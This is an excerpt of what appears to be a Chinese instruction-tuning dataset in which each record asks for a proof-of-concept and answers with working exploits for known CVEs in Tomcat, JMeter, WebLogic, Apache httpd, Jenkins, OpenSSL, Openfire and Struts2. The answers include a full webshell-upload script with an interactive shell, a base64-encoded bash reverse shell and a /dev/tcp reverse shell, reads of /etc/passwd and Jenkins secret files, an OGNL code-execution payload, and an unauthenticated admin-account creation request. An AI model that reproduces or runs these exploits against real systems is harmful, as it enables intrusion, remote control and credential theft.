  197. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Tomcat RCE via JSP Upload Bypass CVE-2017-12617\n漏洞描述:Apache Tomcat版本9.0.0.M1至9.0.0、8.5.0至8.5.22、8.0.0.RC1至8.0.46和7.0.0至7.0.81且启用HTTP PUT时(例如,通过设置只读如果将Default servlet的初始化参数设置为false,则可以通过特制请求将JSP文件上载到服务器。然后可以请求此JSP,并且服务器将执行其中包含的所有代码。\n影响版本:``` Apache Tomcat版本9.0.0.M1至9.0.0 Apache Tomcat版本8.5.0至8.5.22 Apache Tomcat版本8.0.0.RC1至8.0.46 Apache Tomcat版本7.0.0至7.0.81 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-12617\n【POC利用方法】\n1. Apache Tomcat版本9.0.0.M1至9.0.0\nApache Tomcat版本8.5.0至8.5.22\nApache Tomcat版本8.0.0.RC1至8.0.46\nApache Tomcat版本7.0.0至7.0.81\n2. #!/usr/bin/python\n# From https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/tomcat-cve-2017-12617.py\n\"\"\"\n./cve-2017-12617.py [options]\n\n\noptions:\n\n\n-u ,--url [::] check target url if it's vulnerable\n-p,--pwn [::] generate webshell and upload it\n-l,--list [::] hosts list\n\n\n[+]usage:\n\n\n./cve-2017-12617.py -u http://127.0.0.1\n./cve-2017-12617.py --url http://127.0.0.1\n./cve-2017-12617.py -u http://127.0.0.1 -p pwn\n./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn\n./cve-2017-12617.py -l hotsts.txt\n./cve-2017-12617.py --list hosts.txt\n\"\"\"\nfrom __future__ import print_function\nfrom builtins import input\nfrom builtins import str\nfrom builtins import object\nimport requests\nimport re\nimport signal\nfrom optparse import OptionParser\n\n\n\n\n\n\n\n\nclass bcolors(object):\n    HEADER = '\\033[95m'\n    OKBLUE = '\\033[94m'\n    OKGREEN = '\\033[92m'\n    WARNING = '\\033[93m'\n    FAIL = '\\033[91m'\n    ENDC = '\\033[0m'\n    BOLD = '\\033[1m'\n    UNDERLINE = '\\033[4m'\n\n\n\n\nbanner=\"\"\"\n\n\n   _______      ________    ___   ___  __ ______     __ ___   __ __ ______\n  / ____\\ \\    / /  ____|  |__ \\ / _ \\/_ |____  |   /_ |__ \\ / //_ |____  |\n | |     \\ \\  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /\n | |      \\ \\/ / |  __|______/ /| | | || |  / /______| | / / '_ \\| |  / /\n | |____   \\  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /\n  \\_____|   \\/   |______|  |____|\\___/ |_|/_/        |_|____\\___/|_|/_/\n\n\n\n[@intx0x80]\n\n\"\"\"\n\n\n\n\n\ndef signal_handler(signal, frame):\n\n    print (\"\\033[91m\"+\"\\n[-] Exiting\"+\"\\033[0m\")\n\n    exit()\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n\n\n\ndef removetags(tags):\n    remove = re.compile('<.*?>')\n    txt = re.sub(remove, '\\n', tags)\n    return txt.replace(\"\\n\\n\\n\",\"\\n\")\n\n\ndef getContent(url,f):\n    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n    re=requests.get(str(url)+\"/\"+str(f), headers=headers)\n    return re.content\n\ndef createPayload(url,f):\n    evil='<% out.println(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");%>'\n    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n    req=requests.put(str(url)+str(f)+\"/\",data=evil, headers=headers)\n    if req.status_code==201:\n        print(\"File Created ..\")\n\n\ndef RCE(url,f):\n    EVIL=\"\"\"<FORM METHOD=GET ACTION='{}'>\"\"\".format(f)+\"\"\"\n    <INPUT name='cmd' type=text>\n    <INPUT type=submit value='Run'>\n    </FORM>\n    <%@ page import=\"java.io.*\" %>\n    <%\n   String cmd = request.getParameter(\"cmd\");\n   String output = \"\";\n   if(cmd != null) {\n      String s = null;\n      try {\n         Process p = Runtime.getRuntime().exec(cmd,null,null);\n         BufferedReader sI = new BufferedReader(new\nInputStreamReader(p.getInputStream()));\n         while((s = sI.readLine()) != null) { output += s+\"</br>\"; }\n      }  catch(IOException e) {   e.printStackTrace();   }\n   }\n%>\n<pre><%=output %></pre>\"\"\"\n\n\n\n    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\n    req=requests.put(str(url)+f+\"/\",data=EVIL, headers=headers)\n\n\n\ndef shell(url,f):\n\n    while True:\n        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n        cmd=input(\"$ \")\n        payload={'cmd':cmd}\n        if cmd==\"q\" or cmd==\"Q\":\n            break\n\n        re=requests.get(str(url)+\"/\"+str(f),params=payload,headers=headers)\n        re=str(re.content)\n        t=removetags(re)\n        print(t)\n\n\n\n\n\n#print bcolors.HEADER+ banner+bcolors.ENDC\n\nparse=OptionParser(\n\n\nbcolors.HEADER+\"\"\"\n\n\n   _______      ________    ___   ___  __ ______     __ ___   __ __ ______\n  / ____\\ \\    / /  ____|  |__ \\ / _ \\/_ |____  |   /_ |__ \\ / //_ |____  |\n | |     \\ \\  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /\n | |      \\ \\/ / |  __|______/ /| | | || |  / /______| | / / '_ \\| |  / /\n | |____   \\  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /\n  \\_____|   \\/   |______|  |____|\\___/ |_|/_/        |_|____\\___/|_|/_/\n\n\n\n\n./cve-2017-12617.py [options]\n\noptions:\n\n-u ,--url [::] check target url if it's vulnerable\n-p,--pwn  [::] generate webshell and upload it\n-l,--list [::] hosts list\n\n[+]usage:\n\n./cve-2017-12617.py -u http://127.0.0.1\n./cve-2017-12617.py --url http://127.0.0.1\n./cve-2017-12617.py -u http://127.0.0.1 -p pwn\n./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn\n./cve-2017-12617.py -l hotsts.txt\n./cve-2017-12617.py --list hosts.txt\n\n\n[@intx0x80]\n\n\"\"\"+bcolors.ENDC\n\n    )\n\n\nparse.add_option(\"-u\",\"--url\",dest=\"U\",type=\"string\",help=\"Website Url\")\nparse.add_option(\"-p\",\"--pwn\",dest=\"P\",type=\"string\",help=\"generate webshell and upload it\")\nparse.add_option(\"-l\",\"--list\",dest=\"L\",type=\"string\",help=\"hosts File\")\n\n(opt,args)=parse.parse_args()\n\nif opt.U==None and opt.P==None and opt.L==None:\n    print(parse.usage)\n    exit(0)\n\n\n\nelse:\n    if opt.U!=None and opt.P==None and opt.L==None:\n        print(bcolors.OKGREEN+banner+bcolors.ENDC)\n        url=str(opt.U)\n        checker=\"Poc.jsp\"\n        print(bcolors.BOLD +\"Poc Filename  {}\".format(checker))\n        createPayload(str(url)+\"/\",checker)\n        con=getContent(str(url)+\"/\",checker)\n        if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:\n            print(bcolors.WARNING+url+' it\\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)\n            print(bcolors.WARNING+url+\"/\"+checker+bcolors.ENDC)\n\n        else:\n            print('Not Vulnerable to CVE-2017-12617 ')\n    elif opt.P!=None and opt.U!=None and  opt.L==None:\n        print(bcolors.OKGREEN+banner+bcolors.ENDC)\n        pwn=str(opt.P)\n        url=str(opt.U)\n        print(\"Uploading Webshell .....\")\n        pwn=pwn+\".jsp\"\n        RCE(str(url)+\"/\",pwn)\n        shell(str(url),pwn)\n    elif opt.L!=None and opt.P==None and opt.U==None:\n        print(bcolors.OKGREEN+banner+bcolors.ENDC)\n        w=str(opt.L)\n        f=open(w,\"r\")\n        print(\"Scaning hosts in {}\".format(w))\n        checker=\"Poc.jsp\"\n        for i in f.readlines():\n            i=i.strip(\"\\n\")\n            createPayload(str(i)+\"/\",checker)\n            con=getContent(str(i)+\"/\",checker)\n            if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:\n                print(str(i)+\"\\033[91m\"+\" [ Vulnerable ] \"\"\\033[0m\")\n3. re=requests.get(str(url)+\"/\"+str(f),params=payload,headers=headers)\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Tomcat RCE via JSP Upload Bypass.md"}
    198. 

  198. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jmeter RMI 反序列化命令执行漏洞 CVE-2018-1297\n漏洞描述:Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2018-1297\n【POC利用方法】\n1. docker-compose up -d\n2. java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success'\n3. java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.174.128 1099 BeanShell1 \"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}\"\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Jmeter RMI 反序列化命令执行漏洞 CVE-2018-1297.md"}
    199. 

  199. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic 二次反序列化漏洞 CVE-2021-2394\n漏洞描述:Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。 这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。\n影响版本:``` Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0 Oracle WebLogic Server 12.2.1.4.0 Oracle WebLogic Server 14.1.1.0.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-2394\n【POC利用方法】\n1. Oracle WebLogic Server 10.3.6.0.0\nOracle WebLogic Server 12.1.3.0.0\nOracle WebLogic Server 12.2.1.3.0\nOracle WebLogic Server 12.2.1.4.0\nOracle WebLogic Server 14.1.1.0.0\n2. https://github.com/mbechler/marshalsec # 需要自己编译\nmvn clean package –DskipTests\n\nhttps://github.com/RandomRobbieBF/marshalsec-jar # 可以直接使用\n3. public class Exploit {\n\n    static {\n        System.err.println(\"Pwned\");\n        try {\n            String cmds = \"calc\";\n            Runtime.getRuntime().exec(cmds);\n        } catch ( Exception e ) {\n            e.printStackTrace();\n        }\n    }\n}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Weblogic 二次反序列化漏洞 CVE-2021-2394.md"}
    200. 

  200. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache HTTP Server 2.4.50 路径穿越漏洞 CVE-2021-42013\n漏洞描述:Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞[CVE-2021-41773](https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-41773)进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 这个漏洞可以影响Apache HTTP Server 2.4.49以及2.4.50两个版本。 参考链接: - https://httpd.apache.org/security/vulnerabilities_24.html - https://twitter.com/roman_soft/status/1446252280597078024\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-42013\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd\n3. curl -v --data \"echo;id\" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache HTTP Server 2.4.50 路径穿越漏洞 CVE-2021-42013.md"}
    201. 

  201. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jenkins CLI 接口任意文件读取漏洞 CVE-2024-23897\n漏洞描述:Jenkins是一个开源的自动化服务器。 Jenkins使用[args4j](https://github.com/kohsuke/args4j)来解析命令行输入,并支持通过HTTP、Websocket等协议远程传入命令行参数。args4j中用户可以通过`@`字符来加载任意文件,这导致攻击者可以通过该特性来读取服务器上的任意文件。 该漏洞影响Jenkins 2.441及以前的版本。 参考链接: - [https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314](https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314) - [https://mp.weixin.qq.com/s/2a4NXRkrXBDhcL9gZ3XQyw](https://mp.weixin.qq.com/s/2a4NXRkrXBDhcL9gZ3XQyw)\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2024-23897\n【POC利用方法】\n1. docker compose up -d\n2. java -jar jenkins-cli.jar -s http://your-vps-ip:8080/ -http help 1 \"@/proc/self/environ\"\n3. java -jar jenkins-cli.jar -s http://your-vps-ip:8080/ -http help 1 \"@/var/jenkins_home/secret.key\"\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Jenkins CLI 接口任意文件读取漏洞 CVE-2024-23897.md"}
    202. 

  202. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenSSL 心脏滴血漏洞 CVE-2014-0160\n漏洞描述:2014年4月7日,OpenSSL发布安全公告,在OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。\n影响版本:``` OpenSSL1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等版本 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2014-0160\n【POC利用方法】\n1. OpenSSL1.0.1、1.0.1a、1.0.1b、1.0.1c、1.0.1d、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等版本\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/openssl/heartbleed\ndocker-compose up -d\n3. msf5 > use auxiliary/scanner/ssl/openssl_heartbleed\nmsf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options\n\nModule options (auxiliary/scanner/ssl/openssl_heartbleed):\n\n   Name              Current Setting  Required  Description\n   ----              ---------------  --------  -----------\n   DUMPFILTER                         no        Pattern to filter leaked memory before storing\n   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation\n   MAX_KEYTRIES      50               yes       Max tries to dump key\n   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response\n   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'\n   RPORT             443              yes       The target port (TCP)\n   STATUS_EVERY      5                yes       How many retries until key dump status\n   THREADS           1                yes       The number of concurrent threads (max one per host)\n   TLS_CALLBACK      None             yes       Protocol to use, \"None\" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)\n   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)\n\n\nAuxiliary action:\n\n   Name  Description\n   ----  -----------\n   SCAN  Check hosts for vulnerability\n\n\nmsf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhost 192.168.51.133\nrhost => 192.168.51.133\nmsf5 auxiliary(scanner/ssl/openssl_heartbleed) > set  verbose true\nverbose => true\nmsf5 auxiliary(scanner/ssl/openssl_heartbleed) > run\n                                                                                                                                                                                                                                           \n[*] 192.168.51.133:443    - Leaking heartbeat response #1                                                                                                                                                                                  \n[*] 192.168.51.133:443    - Sending Client Hello...                                                                                                                                                                                        \n[*] 192.168.51.133:443    - SSL record #1:                                                                                                                                                                                                 \n[*] 192.168.51.133:443    -     Type:    22                                                                                                                                                                                                \n[*] 192.168.51.133:443    -     Version: 0x0301                                                                                                                                                                                            \n[*] 192.168.51.133:443    -     Length:  86                                                                                                                                                                                                \n[*] 192.168.51.133:443    -     Handshake #1:                                                                                                                                                                                              \n[*] 192.168.51.133:443    -             Length: 82                                                                                                                                                                                         \n[*] 192.168.51.133:443    -             Type:   Server Hello (2)                                                                                                                                                                           \n[*] 192.168.51.133:443    -             Server Hello Version:           0x0301                                                                                                                                                             \n[*] 192.168.51.133:443    -             Server Hello random data:       5fd46996727a4e50c0e2eaecf52d1592384aaa6870d4d65eea8b6b34eb47a389\n[*] 192.168.51.133:443    -             Server Hello Session ID length: 32\n[*] 192.168.51.133:443    -             Server Hello Session ID:        66e9cacbefcb28955de31c38bd9dff93de153a6d6247fa117ebc3f2f091d6f74\n[*] 192.168.51.133:443    - SSL record #2:\n[*] 192.168.51.133:443    -     Type:    22\n[*] 192.168.51.133:443    -     Version: 0x0301\n[*] 192.168.51.133:443    -     Length:  822\n[*] 192.168.51.133:443    -     Handshake #1:\n[*] 192.168.51.133:443    -             Length: 818\n[*] 192.168.51.133:443    -             Type:   Certificate Data (11)\n[*] 192.168.51.133:443    -             Certificates length: 815\n[*] 192.168.51.133:443    -             Data length: 818\n[*] 192.168.51.133:443    -             Certificate #1:\n[*] 192.168.51.133:443    -                     Certificate #1: Length: 812\n[*] 192.168.51.133:443    -                     Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, issuer=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, serial=#<OpenSSL::BN:0x00007efe8154c028>, not_before=2020-08-09 17:03:46 UTC, not_after=2021-08-09 17:03:46 UTC>\n[*] 192.168.51.133:443    - SSL record #3:\n[*] 192.168.51.133:443    -     Type:    22\n[*] 192.168.51.133:443    -     Version: 0x0301\n[*] 192.168.51.133:443    -     Length:  331\n[*] 192.168.51.133:443    -     Handshake #1:\n[*] 192.168.51.133:443    -             Length: 327\n[*] 192.168.51.133:443    -             Type:   Server Key Exchange (12)\n[*] 192.168.51.133:443    - SSL record #4:\n[*] 192.168.51.133:443    -     Type:    22\n[*] 192.168.51.133:443    -     Version: 0x0301\n[*] 192.168.51.133:443    -     Length:  4\n[*] 192.168.51.133:443    -     Handshake #1:\n[*] 192.168.51.133:443    -             Length: 0\n[*] 192.168.51.133:443    -             Type:   Server Hello Done (14)\n[*] 192.168.51.133:443    - Sending Heartbeat...\n[*] 192.168.51.133:443    - Heartbeat response, 65535 bytes\n[+] 192.168.51.133:443    - Heartbeat response with leak, 65535 bytes\n[*] 192.168.51.133:443    - Printable info leaked:\n......_...DV.\\....G...{.vc..i ..Gv.'....f.....\".!.9.8.........5.............................3.2.....E.D...../...A.......................................w.....#.'.g.@.r.v.........8.........2.....E.D.......Q.......P.=...<.......A...............................#.............*.(.........................................+........-.....3.&.$... 3.<.]...et1......L.D.L%*.V8....{............................................................................................................................................jectReference\" type=\"ServiceInstance\">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>W&V.b...?....|.y..................................................................................................................................... repeated 15479 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@.................................................................................................................................................................................................................................................................................................................................QA......h.......h.........7.RV....7.RV..................................................................................................................................... repeated 4129 times .....................................................................................................................................0......X.......X.........................7.RV..............................RV..=.c.RV.. .7.RV..x.7.RV....7.RV....7.RV..x.7.RV..x.7.RV..h.7.RV....7.RV....7.RV..192.168.51.146 - - [12/Dec/2020:06:47:40 +0000] \"POST /sdk HTTP/1.1\" 404 170 \"-\" \"Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)\".org/book/nse.html)\"..................................................................................................................................... repeated 3184 times .....................................................................................................................................Q ........................7.RV....7.RV..................................................................................................................................... repeated 7539 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................@.......................................................................................................................................................................................................$4.RV..................................@....... .......0.8.RV..........`.......0........$4.RV..jfx...&...~.RV..........PA......`....... '..RV..@d4.RV....................2.RV....................2.RV..........................1.................8.RV..........................1...............................................!...............h....... ...............m..U`.W.....O.>c.....E^X4........kr[..:.1...z[..x.W].........f...3h.qS.&K.(A*q*...].tx.b....X........Np....l.F...5....~..Z2.D..$........................................................................................................................................1.......x.......x.......P.2.RV....2.RV..0.......0.......>#NQ[.8.].......&.i2y.x.I....iOk........a....... '..RV..`.2.RV..................0.2.RV....................2.RV......................;P.e.........................U.6.&`.Ks..w>V.. ^..N..z....z...M.+..n/i..C...D......a..2.p..<.....}k.W:.Eq....Ui*I.X...m...-..x..3}.5NM............... .......P.2.RV..................1.........t.............................0....................V..>...I5.F......!.3Xhy.4.....r.....h.d..b........).......3.....&......IE...c,8.T.~..H.P.{y.....CK.,!&..;..vw....H.C...q....%e..{.XT.jq.R.r.....RHw..57.COlB..|......@...*.G(3..-N..P....mLO..]./.,9..|..+2.Lh..q..dF.m...'.....`...S.8........Q...U.0....I................................................................................................................................................................................................................................................................................ '..RV.. .8.RV..`.2.RV....................8.RV.................................. .2.RV....................2.RV............................................2.RV....................2.RV.......................... .2.RV.. .2.RV..................h.......h.........8.RV....8.RV..................................................................................................................................... repeated 745 times .....................................................................................................................................#8.RV..`.2.RV........!.3Xhy.4.....r.....h.d..b........).......3.....&......IE...c,8.T.~..H.P.{y.....CK.,!&..;..vw....H.C...q....%e..{.XT.jq.R.r.....RHw..57.COlB..|......@...*.G(3..-N..P....mLO..]./.,9..|..+2.Lh..q..dF.m...'.....`...S.8........Q...U.0....I ..................................................................................................................................... repeated 277 times .....................................................................................................................................X.......`.2.RV..........................................................P...........RV............................................................................................................................................................................................................................................................................................................................................2.RV..X..................................................................................................................................... repeated 437 times .....................................................................................................................................A.......X.........1.RV..................................................................................................................................................................................................................................................................................................................................X.......X..................................................................................................................................... repeated 429 times .....................................................................................................................................x.......!.......X.......X..................................................................................................................................... repeated 1942 times .....................................................................................................................................@..........V...R.._.i.rzNP.....-..8J.hp..^..k4.G.. f.....(.]..8......:mbG..~.?/..ot...................6...2../..,0..(0...........j..0...*.H........0V1.0...U....US1.0...U....Denial1.0...U....Springfield1.0...U....Dis1.0...U....localhost0...200809170346Z..210809170346Z0V1.0...U....US1.0...U....Denial1.0...U....Springfield1.0...U....Dis1.0...U....localhost0..\"0...*.H.............0.........8...;....../t.....^.....P..=....w.*b.a>.8.Q.?.$.c.......{G. ........l..i...D..V....0......B..J..Y.c.wO.....M.Df..R....\".4.u...............P.><7d}VK4^.$.S..U..u..R7l.+.H....;.V\\.w.?..).........[....M..3......?..e...WBI^..&.'.nhV!.......V.;...y..+&tm.c1..3-.....0...*.H..............>.c..|.s(......,..H.1..0.=l`...(2..Sb.......`...c....5J....v..uj.*^i.$6^..a3.s.......v...\\....M.pK.9....t.&...|y...u1.......u..M..%.+..{e....G..~.v.D.6...............=).3{......r/.\"vz..a.U..5-.5.=......l..ud......Nx...n..$h...4.G.~b.LU.Y...37..e....%.w.......K...G...A....~m.h,......qz>}uA.^)..A.&}o@..'...y.]..V..S..JY........Y/.u|....$.n.T._.b\\\\c...o.]....L.h...v*....z..D..?Kq9hJ.kT....?.....=......su....p.S...j.e.....-N}.S...x..Z.....t.;Z...n=.1.......J.1n.l...w. .l.d.W. .........8..`.>O........t...r..~.A$..R...v.8......x.\\o<.....#hS......Vz.6....V..l....-.....,n...p.(..L.w.7h3...3..................................................................................................................................... repeated 6250 times .....................................................................................................................................\n[*] 192.168.51.133:443    - Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/OpenSSL 心脏滴血漏洞 CVE-2014-0160.md"}
    203. 

  203. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Openfire管理后台认证绕过漏洞 CVE-2023-32315\n漏洞描述:Openfire 是根据开放源 Apache 许可获得许可的实时协作(RTC)服务器。 在Openfire版本4.7.4和4.6.7及以前,Openfire的Web管理后台存在一处目录穿越漏洞,这将允许攻击者绕过权限校验访问所有受限页面。 参考文档: - https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm - https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2023-32315\n【POC利用方法】\n1. docker compose up -d\n2. GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1\nHost: your-ip:9090\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36\nConnection: close\nCache-Control: max-age=0\nCookie: csrf=csrftoken\n3. - https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Openfire管理后台认证绕过漏洞 CVE-2023-32315.md"}
    204. 

  204. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-061 远程代码执行漏洞 CVE-2020-17530\n漏洞描述:S2-061是对S2-059的绕过,Struts2官方对S2-059的修复方式是加强OGNL表达式沙盒,而S2-061绕过了该沙盒。 参考链接: - https://cwiki.apache.org/confluence/display/WW/S2-061 - https://github.com/ka1n4t/CVE-2020-17530 - https://www.anquanke.com/post/id/225252 - https://mp.weixin.qq.com/s/RD2HTMn-jFxDIs4-X95u6g\n影响版本:影响版本: Struts 2.0.0 - Struts 2.5.25\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-17530\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. POST /index.action HTTP/1.1\nHost: your-ip:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36\nConnection: close\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 829\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{(#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]).(#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]).(#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")).(#bean.setBean(#stack)).(#context=#bean.get(\"context\")).(#bean.setBean(#context)).(#macc=#bean.get(\"memberAccess\")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")).(#bean.put(\"excludedClasses\",#emptyset)).(#bean.put(\"excludedPackageNames\",#emptyset)).(#arglist=#instancemanager.newInstance(\"java.util.ArrayList\")).(#arglist.add(\"id\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")).(#execute.exec(#arglist))}\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF--\n3. echo \"bash -i >& /dev/tcp/192.168.174.128/9999 0>&1\" > shell.sh\npython3环境下:python -m http.server 80\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-061 远程代码执行漏洞 CVE-2020-17530.md"}
    205. 

